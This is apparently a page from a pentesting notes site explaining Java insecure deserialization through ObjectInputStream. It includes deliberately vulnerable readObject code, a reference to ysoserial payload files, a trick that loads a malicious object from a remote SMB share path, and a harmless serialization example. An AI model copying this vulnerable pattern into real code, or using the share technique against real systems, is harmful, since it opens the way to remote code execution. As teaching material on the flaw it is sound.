ObjectInputStream

One of the most common insecure deserialization flaws occurs during unsecure ObjectInputSteam usage. Below you can find sample of vulnerable code:

String filename = "file.bin" // suppose it is user controlled
// file.bin -> Binary file with object created with ysoserial

fis = new FileInputStream(fileName);
ois = new ObjectInputStream(fis);
// Even the line below is casted to HashMap object is still created before that
java.util.HashMap today = (java.util.HashMap)ois.readObject(); // <- Insecure

How to reach malicious file when we have access to unsanatized FileInputStream? Its simple!

String filename = "\\192.168.0.1\share\file.bin" // <- Reach for file on the share

fis = new FileInputStream(fileName); // unsanatized FileInputStream can reach the shares

Serializing Manually Created Class

import java.io.FileOutputStream;
import java.io.ObjectOutputStream;

public class SerializePerson {
    public static void main(String[] args) throws Exception {
        Person p = new Person("Alice", 30); // change this to your object
        try (FileOutputStream fos = new FileOutputStream("person.bin");
             ObjectOutputStream oos = new ObjectOutputStream(fos)) {
            oos.writeObject(p);
            System.out.println("Wrote person.bin");
        }
    }
}

PreviousInsecure Deserialization NextXML Serializer (.NET)

Last updated 3 months ago